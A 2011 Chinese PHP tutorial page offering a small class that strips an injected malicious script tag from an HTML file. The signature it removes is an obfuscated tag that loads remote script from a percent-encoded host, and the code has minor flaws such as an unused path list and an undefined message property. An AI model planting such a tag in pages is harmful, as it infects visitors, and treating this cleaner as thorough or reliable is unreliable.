當(dāng)前位置:首頁文章首頁 IT學(xué)院 PHP

教你如何運(yùn)用PHP清除網(wǎng)頁病毒

作者:  來源:  發(fā)布時(shí)間:2011-5-25 15:32:48  點(diǎn)擊:

本文章給大家分享的是關(guān)于利用PHP清除網(wǎng)頁病毒的方法,好像是進(jìn)行一些替換操作,大家可以測(cè)試,希望對(duì)大家有所幫助。

<?php
Class clear_virus{
public $index ='b.html';
public $filepath =array('b.html');
public $virus_type ="<script src=http://%61%76%65%33%2E%63%6E></script>";
function open_file(){
if(file_exists($this->index)){
$tmp =file_get_contents($this->index);
if( strrpos($tmp,$this->virus_type)!== false){
$temp =str_replace($this->virus_type,'',$tmp);
$handle =fopen($this->index,'w');
fwrite($handle,$temp);
fclose($handle);
}else{
echo $this->virus_find;
}
}
}
}
$virus =new clear_virus;
$virus->open_file();
?>
清除script 病毒

-

資料引用:http://www.knowsky.com/442657.html

文章評(píng)論

軟件按字母排列: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z